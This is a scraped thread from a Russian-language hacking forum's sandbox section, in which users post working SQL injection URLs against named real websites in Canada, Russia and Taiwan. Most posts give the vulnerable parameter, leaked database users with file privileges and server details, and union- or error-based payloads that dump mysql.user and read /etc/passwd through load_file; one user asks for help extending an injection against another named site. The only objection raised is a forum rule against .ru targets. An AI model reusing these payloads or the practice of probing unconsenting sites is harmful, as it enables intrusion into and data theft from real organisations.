HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #271  
Старый 22.05.2017, 20:27
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

SQLi с чтением файла из файловой системы и file_priv Y

Сайт:eohu.ca

Уязвимый параметор: newsID через GET

root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y

root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64

Эксплоит:

Код:
Code:
http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file('/etc/passwd') from mysql.user --+
 
Ответить с цитированием

  #272  
Старый 24.05.2017, 16:13
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

SQLi с чтением файла из файловой системы

Сайт:bbgv.org

Уязвимый параметор: cat_id через GET

root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N

root@localhost:5.1.73:redhat-linux-gnu:x86_64

Эксплоит:

Код:
Code:
view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9,10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+
 
Ответить с цитированием

  #273  
Старый 25.05.2017, 17:14
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Сайт:salut.ru ТИЦ 475

SQLi Error base черз GET, уязвимый параметр SectionId

salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/

Эксплоит:

Код:
Code:
http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
Сайт:irbis-opt.ru ТИЦ 20 Всякие палатки и спортивная снаряга

SQLi черз GET, уязвимый параметр idd

nordsportspb@81.177.141.127:10.1.22-MariaDB:Linux:x86_64:/usr

Эксплоит:

Код:
Code:
http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+
Сайт:economic-study.ru ТИЦ 10 Вузы Москвы

SQLi черз GET, уязвимый параметр ID

vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr

Эксплоит:

Код:
Code:
http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compile_os,@@version_compile_machine,@@basedir,10 --+
 
Ответить с цитированием

  #274  
Старый 25.05.2017, 18:02
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Цитата:
Сообщение от Печа  
Печа said:

Сайт:salut.ru
ТИЦ 475
SQLi Error base черз GET, уязвимый параметр SectionId
salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/
Эксплоит:
Код:
Code:
http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+
Сайт:irbis-opt.ru
ТИЦ 20
Всякие палатки и спортивная снаряга
SQLi черз GET, уязвимый параметр idd
nordsportspb@81.177.141.127:10.1.22-MariaDB:Linux:x86_64:/usr
Эксплоит:
Код:
Code:
http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+
Сайт:economic-study.ru
ТИЦ 10
Вузы Москвы
SQLi черз GET, уязвимый параметр ID
vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr
Эксплоит:
Код:
Code:
http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compile_os,@@version_compile_machine,@@basedir,10 --+
.ru саиты запрещены
 
Ответить с цитированием

  #275  
Старый 25.05.2017, 18:26
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Цитата:
Сообщение от Octavian  
Octavian said:

.ru саиты запрещены
Я когда форум просматривал, посты с .ru часто попадались, или это новые правила?

Если админы скажут не вопрос, удалю свой пост.

Да и софтом я в .ru не лазил, искал через дорки и крутил руками
 
Ответить с цитированием

  #276  
Старый 26.05.2017, 14:41
Печа
Guest
Сообщений: n/a
Провел на форуме:
14926

Репутация: 17
По умолчанию

Сайт:ene.com.tw

SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid

root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y.

enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log.

Эксплоит:

Код:
Code:
http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
 
Ответить с цитированием

  #277  
Старый 27.05.2017, 23:08
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

 
Ответить с цитированием

  #278  
Старый 11.06.2017, 14:54
Octavian
Guest
Сообщений: n/a
Провел на форуме:
97114

Репутация: 24
По умолчанию

Предугадываем URL восстановление пароля md5(time())

Цитата:
 
Ответить с цитированием

  #279  
Старый 24.07.2017, 13:28
paponi
Guest
Сообщений: n/a
Провел на форуме:
1526

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #280  
Старый 30.09.2017, 22:34
x4t3a
Guest
Сообщений: n/a
Провел на форуме:
238

Репутация: 0
По умолчанию

sqli: http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637 UNION ALL SELECT 1,2,3

а дальше не получается раскрутить
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ